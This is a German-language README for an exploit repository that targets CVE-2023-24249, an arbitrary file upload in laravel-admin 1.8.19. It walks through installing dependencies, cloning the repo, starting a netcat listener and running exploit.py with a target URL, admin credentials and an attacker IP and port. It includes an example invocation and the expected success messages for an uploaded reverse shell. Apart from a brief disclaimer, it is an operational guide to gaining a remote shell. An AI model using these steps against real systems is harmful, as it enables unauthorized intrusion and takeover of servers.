
Exploit-Skript für CVE-2023-24249 - eine Schwachstelle, die Remote-Code-Ausführung über Datei-Upload und Befehlsinjektion ermöglicht.
Dieses Repository enthält ein Exploit-Skript für CVE-2023-24249, eine kritische Schwachstelle in laravel-admin Version 1.8.19. Diese Schwachstelle ermöglicht das beliebige Hochladen von Dateien (Arbitrary File Upload), wodurch Angreifer über eine manipulierte PHP-Datei beliebigen Code ausführen können. Der Exploit demonstriert, wie ein Angreifer eine Reverse Shell auf die Zielanwendung hochladen und ausführen kann, um Remote-Zugriff zu erlangen.
CVE-2023-24249 ist eine Schwachstelle für beliebiges Datei-Hochladen (Arbitrary File Upload) in laravel-admin v1.8.19. Diese Schwachstelle erlaubt Angreifern, beliebige PHP-Dateien hochzuladen und auszuführen, was zu potenzieller Remote-Codeausführung führen kann.
Das bereitgestellte Exploit-Skript automatisiert die Ausnutzung von CVE-2023-24249. Es führt die folgenden Schritte aus:
requests-Bibliothekbeautifulsoup4-BibliothekInstalliere die erforderlichen Bibliotheken mit pip:
pip install requests beautifulsoup4
Repository klonen:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
Listener auf deinem Rechner starten:
nc -lvnp <PORT>
Exploit-Skript ausführen:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
Ersetze <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> und <YOUR_PORT> durch die entsprechenden Werte:
<TARGET_URL>: Die URL der Zielanwendung.<USERNAME>: Der Benutzername für die Authentifizierung.<PASSWORD>: Das Passwort für die Authentifizierung.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
Wenn der Exploit erfolgreich ist, gibt das Skript Folgendes aus:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
Dieses Skript dient ausschließlich Bildungszwecken. Die unbefugte Verwendung dieses Skripts gegen ein System ohne ausdrückliche Erlaubnis ist illegal und unethisch. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
<YOUR_IP>: Deine IP-Adresse, um die Reverse-Shell-Verbindung zu empfangen.<YOUR_PORT>: Der Port, auf dem dein Listener läuft.